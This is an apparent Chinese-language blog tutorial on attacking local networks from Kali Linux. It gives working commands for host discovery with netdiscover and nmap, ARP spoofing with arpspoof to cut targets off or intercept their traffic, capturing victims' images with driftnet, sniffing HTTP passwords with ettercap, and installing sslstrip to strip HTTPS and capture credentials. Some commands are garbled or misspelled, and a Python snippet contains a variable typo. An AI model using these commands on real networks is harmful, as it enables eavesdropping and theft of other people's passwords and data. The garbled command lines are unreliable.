一篇文章帶你瞭解kali局域網攻擊

前言

很久以前的博客才發現,發佈一下。
這個系列以後有時間再做。

arp攻擊

arp路由鏈表,感興趣的自行百度,我的博客我的筆記.

路由指向

介紹兩個東西.

echo 0 >/proc/sys/net/ipv4/ip_forward #讓經過的數據不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #讓數據流通

內網掃描

這個在百度上你可以看到很多相關的方式,比如nmap fping

但是基本上掃描結果不太號,在虛擬機上你會發現你把主機的防火墻關瞭都掃不到主機.

這裡使用netdiscover
當然這裡也寫幾個nmap之類的指令

nmap -PR -sL ip
fping -asg ip
netdiscover -i kali網卡 -r ip(網段)
netdiscover -i eth0 -r 192.168.43.1/30

掃描速度是比較慢的

在這裡插入圖片描述

斷網攻擊

arpspoof -i kali的網卡 -t 目標地址 目標網卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1

arp欺騙信息獲取

1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1 開始欺騙讓數據經過你的電腦

2.echo 1 >/proc/sys/net/ipv4/ip_forward 放掉數據包

獲取圖片

使用工具difinet

difinet i eth0(網卡)

實際操作:

在這裡插入圖片描述

圖片會在那裡臨時保存

在這裡插入圖片描述

由於網絡問題可能會有點卡

獲取HTTP連接的密碼信息

使用ettercap

其他的操作還是一樣的,要開啟arp欺騙

ettercap Tq i eth0
T 文本模式 q 安靜模式 i 網卡

在這裡插入圖片描述

然後等待即可.不過現在都是https,作用不大

出現中文怎麼辦,直接賦值中文亂碼,之後解碼即可

百度搜索url解碼

或者直接使用python

中文編碼
from urllib.parse import quote,unquote
str1 = '中國'
str2=quote(strl)
print(str2)
解碼
print(unquote(str2))

獲取HTTPS的密碼信息

這個要先修改以下ettercap的配置文件.

vim /etc/ettercap/etter.conf

在這裡插入圖片描述

使用工具 sslstrip

那個吐槽一下 kali 2020是沒有sslstrip的原因是沒有安裝python2的pip 隻有pip3

記住一定要先安裝python2

在kali裡面python 默認為python2 當然你可以用ln -s 修改一下.

apt install python 這個時候會自動安裝python 2.7

然後輸入以下指令安裝sslstrip

git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py install 

這個是python2的,如果沒猜錯可能會遇到OpenSSL報錯說沒有這個模塊

pip install pyOpenSSL

總結

本篇文章就到這裡瞭,希望能給你帶來幫助,也希望您能夠多多關註WalkonNet的更多內容!

推薦閱讀: